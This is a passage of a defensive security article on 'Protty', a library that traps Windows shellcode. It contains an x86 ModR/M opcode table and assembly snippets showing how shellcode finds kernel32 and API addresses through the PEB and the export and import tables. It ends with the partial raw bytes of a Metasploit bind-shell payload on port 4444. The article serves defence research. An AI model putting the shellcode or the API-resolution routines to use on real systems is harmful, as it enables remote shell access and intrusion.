+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		90	       	A [disp32+EAX], EDX/DX/DL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		91	       	A [disp32+ECX], EDX/DX/DL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		92	       	A [disp32+EDX], EDX/DX/DL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		93	       	A [disp32+EBX], EDX/DX/DL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		94	       	A [disp32+[--][--]], EDX/DX/DL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		95	       	A [disp32+EBP], EDX/DX/DL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		96	       	A [disp32+ESI], EDX/DX/DL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		97	       	A [disp32+EDI], EDX/DX/DL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		98	       	A [disp32+EAX], EBX/BX/BL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		99	       	A [disp32+ECX], EBX/BX/BL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		9A	       	A [disp32+EDX], EBX/BX/BL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		9B	       	A [disp32+EBX], EBX/BX/BL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		9C	       	A [disp32+[--][--]], EBX/BX/BL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		9D	       	A [disp32+EBP], EBX/BX/BL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		9E	       	A [disp32+ESI], EBX/BX/BL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		9F	       	A [disp32+EDI], EBX/BX/BL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		A0	       	A [disp32+EAX], ESP/SP/AH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		A1	       	A [disp32+ECX], ESP/SP/AH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		A2	       	A [disp32+EDX], ESP/SP/AH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		A3	       	A [disp32+EBX], ESP/SP/AH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		A4	       	A [disp32+[--][--]], ESP/SP/AH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		A5	       	A [disp32+EBP], ESP/SP/AH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		A6	       	A [disp32+ESI], ESP/SP/AH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		A7	       	A [disp32+EDI], ESP/SP/AH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		A8	       	A [disp32+EAX], EBP/BP/CH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		A9	       	A [disp32+ECX], EBP/BP/CH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		AA	       	A [disp32+EDX], EBP/BP/CH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		AB	       	A [disp32+EBX], EBP/BP/CH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		AC	       	A [disp32+[--][--]], EBP/BP/CH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		AD	       	A [disp32+EBP], EBP/BP/CH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		AE	       	A [disp32+ESI], EBP/BP/CH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		AF	       	A [disp32+EDI], EBP/BP/CH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		B0	       	A [disp32+EAX], ESI/SI/DH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		B1	       	A [disp32+ECX], ESI/SI/DH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		B2	       	A [disp32+EDX], ESI/SI/DH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		B3	       	A [disp32+EBX], ESI/SI/DH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		B4	       	A [disp32+[--][--]], ESI/SI/DH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		B5	       	A [disp32+EBP], ESI/SI/DH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		B6	       	A [disp32+ESI], ESI/SI/DH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		B7	       	A [disp32+EDI], ESI/SI/DH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		B8	       	A [disp32+EAX], EDI/DI/BH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		B9	       	A [disp32+ECX], EDI/DI/BH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		BA	       	A [disp32+EDX], EDI/DI/BH 	
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		BB	       	A [disp32+EBX], EDI/DI/BH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		BC	       	A [disp32+[--][--]], EDI/DI/BH 	
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		BD       	A [disp32+EBP], EDI/DI/BH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		BE	       	A [disp32+ESI], EDI/DI/BH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		BF	       	A [disp32+EDI], EDI/DI/BH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		C0	       	A EAX/AX/AL, EAX/AX/AL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		C1	       	A ECX/CX/CL, EAX/AX/AL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		C2	       	A EDX/DX/DL, EAX/AX/AL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		C3	       	A EBX/BX/BL, EAX/AX/AL  		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		C4	       	A ESP/SP/AH, EAX/AX/AL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		C5	       	A EBP/BP/CH, EAX/AX/AL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		C6	       	A ESI/SI/DH, EAX/AX/AL			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		C7	       	A EDI/DI/BH, EAX/AX/AL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		C8	       	A EAX/AX/AL, ECX/CX/CL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		C9	       	A ECX/CX/CL, ECX/CX/CL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		CA	       	A EDX/DX/DL, ECX/CX/CL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		CB	       	A EBX/BX/BL, ECX/CX/CL  		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		CC	       	A ESP/SP/AH, ECX/CX/CL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		CD	       	A EBP/BP/CH, ECX/CX/CL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		CE	       	A ESI/SI/DH, ECX/CX/CL			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		CF	       	A EDI/DI/BH, ECX/CX/CL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		D0	       	A EAX/AX/AL, EDX/DX/DL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		D1	       	A ECX/CX/CL, EDX/DX/DL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		D2	       	A EDX/DX/DL, EDX/DX/DL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		D3	       	A EBX/BX/BL, EDX/DX/DL  		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		D4	       	A ESP/SP/AH, EDX/DX/DL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		D5	       	A EBP/BP/CH, EDX/DX/DL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		D6	       	A ESI/SI/DH, EDX/DX/DL			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		D7	       	A EDI/DI/BH, EDX/DX/DL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		D8	       	A EAX/AX/AL, EBX/BX/BL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		D9	       	A ECX/CX/CL, EBX/BX/BL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		DA	       	A EDX/DX/DL, EBX/BX/BL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		DB	       	A EBX/BX/BL, EBX/BX/BL  		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		DC	       	A ESP/SP/AH, EBX/BX/BL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		DD	       	A EBP/BP/CH, EBX/BX/BL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		DE	       	A ESI/SI/DH, EBX/BX/BL			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		DF	       	A EDI/DI/BH, EBX/BX/BL 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		E0	       	A EAX/AX/AL, ESP/SP/AH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		E1	       	A ECX/CX/CL, ESP/SP/AH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		E2	       	A EDX/DX/DL, ESP/SP/AH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		E3	       	A EBX/BX/BL, ESP/SP/AH  		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		E4	       	A ESP/SP/AH, ESP/SP/AH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		E5	       	A EBP/BP/CH, ESP/SP/AH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		E6	       	A ESI/SI/DH, ESP/SP/AH			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		E7	       	A EDI/DI/BH, ESP/SP/AH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		E8	       	A EAX/AX/AL, EBP/BP/CH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		E9	       	A ECX/CX/CL, EBP/BP/CH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		EA	       	A EDX/DX/DL, EBP/BP/CH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		EB	       	A EBX/BX/BL, EBP/BP/CH  		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		EC	       	A ESP/SP/AH, EBP/BP/CH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		ED	       	A EBP/BP/CH, EBP/BP/CH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		EE	       	A ESI/SI/DH, EBP/BP/CH			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		EF	       	A EDI/DI/BH, EBP/BP/CH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		F0	       	A EAX/AX/AL, ESI/SI/DH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		F1	       	A ECX/CX/CL, ESI/SI/DH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		F2	       	A EDX/DX/DL, ESI/SI/DH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		F3	       	A EBX/BX/BL, ESI/SI/DH  		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		F4	       	A ESP/SP/AH, ESI/SI/DH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		F5	       	A EBP/BP/CH, ESI/SI/DH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		F6	       	A ESI/SI/DH, ESI/SI/DH			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		F7	       	A EDI/DI/BH, ESI/SI/DH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		F8	       	A EAX/AX/AL, EDI/DI/BH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		F9	       	A ECX/CX/CL, EDI/DI/BH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		FA	       	A EDX/DX/DL, EDI/DI/BH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		FB	       	A EBX/BX/BL, EDI/DI/BH  		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		FC	       	A ESP/SP/AH, EDI/DI/BH 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		FD	       	A EBP/BP/CH, EDI/DI/BH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		FE	       	A ESI/SI/DH, EDI/DI/BH			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		FF	       	A EDI/DI/BH, EDI/DI/BH 			
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+
+As you can see 03h covers "[EBX], EAX/AX/AL". And that's the thing we 
+needed.Now mechanism knows it should scan EAX and EBX registers and update
+them if their values are "similiar" to address of "DECOYS". Of course the
+register checking method could be more efficient (should also check more
+opcodes etc. etc.) - maybe in next versions.
+
+In the mechanism i have used the table listed above, anyway there is also
+"another" ("primary") way to determine what registers are used. The way is
+based on fact that ModR/M byte contains three fields of information (Mod,
+Reg/Opcode, R/M). By checking bits of those entries we can determine what
+registers are used by the instruction (surely interesting tables from
+Intel manuals: "...Addressing Forms with the ModR/M Byte") I'm currently
+working on disassembler engine, so all those codes related to "opcode 
+decoding" topic should be released in the nearest future. And probably if
+Protty project will be continued i will exchange the z0mbie dissassembler
+engine with my own, anyway his baby works very well. 
+
+If you are highly interrested in disassembling the instructions, check the
+[8].
+
+
+
+To see how it works, check following example:
+
+	;----------SNIP--------------------------------------------	
+	mov   eax,fs:[30h]
+	mov   eax,[eax+0ch]
+	mov   esi,[eax+1ch] 	; value changed by protector,ESI=DDDDDDDDh
+	lodsd			; load one dword <- causes exception		
+	;----------SNIP--------------------------------------------
+
+This example faults on "lodsd" instruction, because application is trying
+to load 4 bytes from invalid location - ESI  (because it was changed by 
+P2). 
+
+Prevention library takeovers the exception and checks the instruction. 
+This one is "lodsd" so instead of ModR/M byte (because there is no such
+here) library checks the opcode. When it finds out it is "lodsd" 
+instruction, it scans and updates ESI. Finally the ESI (in this case) is
+rewritten to 0241F28h (original) and the execution is continued including
+the "BAD" instruction.
+
+So that's how P2 works, a lot faster then its older brother P1.
+
+
+--[ VI.   Action - few samples of catched shellcodes
+
+If you have studied descriptions of all of the mechanisms, it is
+time to show where/when Protty prevents them.
+
+Lets take a look at examples of all mechanisms described in paragraph IV.
+
+PEB (Process Environment Block) parsing
+---------------------------------------
+
+	;----------SNIP--------------------------------------------
+	mov eax,dword ptr fs:[30h]	; EAX is now PEB base
+	mov eax,dword ptr [eax+0ch]	; EAX+0Ch = PEB_LDR_DATA
+
+	mov esi,dword ptr [eax+1ch]	; get the first entry
+        ^^^^^^^^^^^^^^^^^^^^^^^^^^^
+               |
+                ---- [P1-I1]
+
+	mov ebx,[esi+08h]		; EBX=ntdll imagebase
+	^^^^^^^^^^^^^^^^^
+		|	
+		 ------- [P2-I1]
+
+	<rest code of PEB parser>
+	;----------SNIP--------------------------------------------
+
+
+- Description for P1
+
+In this example Protty catches the shellcode when the instruction marked
+as [P1-I1] is executed. Since Protty has protected the PEB_LDR_DATA
+region (it's marked as PAGE_NOACCESS) all references to it will
+cause an access violation which will be filtered by Protty.
+Here, shellcode is trying to get first entry from PEB_LDR_DATA structure,
+this causes an exception and this way shellcode is catched - attack
+failed.
+
+
+- Description for P2
+
+
+The mechanism is being activated when [P2-I1] instruction is being
+executed. ESI value is redirected to invalid location so every
+reference to it cause an access violation exception, this is
+filtered by the installed prevention mechanism - in short words:
+attack failed, shellcode was catched.
+
+
+
+searching for kernel in memory
+------------------------------
+
+I think here code is not needed, anyway when/where protty will act in
+this case? As you probably remember from paragraph IV the 
+kernel search code works together with SEH (structured exception handler)
+frame. Everytime shellcode tries invalid location SEH frame handles the
+exception and the search procedure is continued. When Protty is active
+shellcode doesn't have any "second chance" - what does it mean? It means
+that when shellcode will check invalid location (by using SEH) the 
+exception will be filtered by Protty mechanism, in short words shellcode
+will be catched - attack failed.
+
+There are also some shellcodes that search the main shellcode in memory
+also using SEH frames. Generally the idea is to develop small shellcode
+which will only search for the main one stored somewhere in memory. Since
+here SEH frames are also used, such type of shellcodes will be also 
+catched.
+
+
+
+export section parsing 
+----------------------
+
+We are assuming that the attacker has grabbed the imagebase in unknown
+way :) (full code in IV-th chapter - i don't want to past it here)
+
+
+	;----------SNIP--------------------------------------------
+	; EAX=imagebase of kernel32.dll
+
+	xor ebp,ebp		      ; zero the counter
+	mov ebx,[eax+3ch]	      ; get pe header
+	add ebx,eax		      ; normalize
+
+	<...snip...>
+
+	loop_it:
+	mov edi,[ecx]                 ; get one name
+	add edi,eax                   ; normalize
+	cmp dword ptr [edi+4],'Acor'  ; is it GetP-rocA-ddress ?? :)
+	jne @l                        ; nope -> jump to @l
+
+	                              ; yes it is
+	add esi,ebp	              ; add out counter
+	mov esi,[esi]                 ; get the address
+        ^^^^^^^^^^^^^
+              |
+               ---[I1]
+
+	add esi,eax	              ; normalize
+	int 3	                      ; ESI=address of GetProcAddress
+
+	@l:
+	<...snip...>
+
+	;----------SNIP--------------------------------------------
+
+- Description for P1 and P2
+
+Following example is being catched when [I1] instruction is being
+executed - when it tries to read the address of GetProcAddress
+from array with function addresses. Since function addresses array
+is "protected" all references to it will cause access
+violation exception, which will be filtered by the mechanism (like in
+previous points). Shellcode catched, attack failed.
+
+
+import section parsing 
+----------------------
+
+
+	;----------SNIP--------------------------------------------
+	;following example gets LoadLibraryA address from IAT
+
+	IMAGEBASE 		equ 00400000h 
+
+	mov ebx,IMAGEBASE
+	mov eax,ebx
+	add eax,[eax+3ch]                     ; PE header
+
+	mov edi,[eax+80h]                     ; import RVA
+	^^^^^^^^^^^^^^^^^
+              |
+               ----[I1]
+
+	add edi,ebx                           ; normalize
+	xor ebp,ebp
+
+	mov edx,[edi+10h]                     ; pointer to addresses
+        ^^^^^^^^^^^^^^^^^
+              |
+               ----[I2]
+
+	add edx,ebx                           ; normalize
+
+	<...snip...>
+
+	;----------SNIP--------------------------------------------
+
+- Description for P1 and P2
+
+After instruction marked as [I1] is executed, EDI should contain the 
+import section RVA, why should? because since the protection is 
+active import section RVA is faked. In next step (look at instruction
+[I2]) this will cause access violation exception (because of the fact
+that FAKED_IAT_RVA + IMAGEBASE = INVALID LOCATION) and the shellcode
+will be catched. Attack failed also in this case.
+
+There is also a danger that attacker can hardcode IAT RVA. For such
+cases import section array of function names is also protected.
+Look at following code:
+
+	;----------SNIP--------------------------------------------
+
+	<...snip...>
+
+	@loop:
+	mov eax,[esi]
+	^^^^^^^^^^^^^
+		|
+	         --[I1]
+
+	add eax,ebx
+	add eax,2
+	cmp dword ptr [eax],'daoL'            ; is this LoadLibraryA?
+
+	<...snip...>
+
+	;----------SNIP--------------------------------------------
+
+Instruction [I1] is trying to access memory which is not accessible 
+(protection mechanism changed it) and in the result of
+this exception is generated. Protty filters the access violation
+and kills the shellcode - this attack also failed.
+
+And the last example, some shellcode from metasploit.com:
+
+
+win32_bind by metasploit.com 
+----------------------------
+EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub 
+
+(replace "data" with "data" from protty_example/sample_bo.c then 
+recompile and run)
+
+unsigned char data[] =
+"\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97"
+"\x25\xaa\xb5\x83\xeb\xfc\xe2\xf4\x6b\x4f\x41\xfa\x7f\xdc\x55\x4a"
+"\x68\x45\x21\xd9\xb3\x01\x21\xf0\xab\xae\xd6\xb0\xef\x24\x45\x3e"
+"\xd8\x3d\x21\xea\xb7\x24\x41\x56\xa7\x6c\x21\x81\x1c\x24\x44\x84"
+"\x57\xbc\x06\x31\x57\x51\xad\x74\x5d\x28\xab\x77\x7c\xd1\x91\xe1"
+"\xb3\x0d\xdf\x56\x1c\x7a\x8e\xb4\x7c\x43\x21\xb9\xdc\xae\xf5\xa9"
+"\x96\xce\xa9\x99\x1c\xac\xc6\x91\x8b\x44\x69\x84\x57\x41\x21\xf5"
+"\xa7\xae\xea\xb9\x1c\x55\xb6\x18\x1c\x65\xa2\xeb\xff\xab\xe4\xbb"
+"\x7b\x75\x55\x63\xa6\xfe\xcc\xe6\xf1\x4d\x99\x87\xff\x52\xd9\x87"
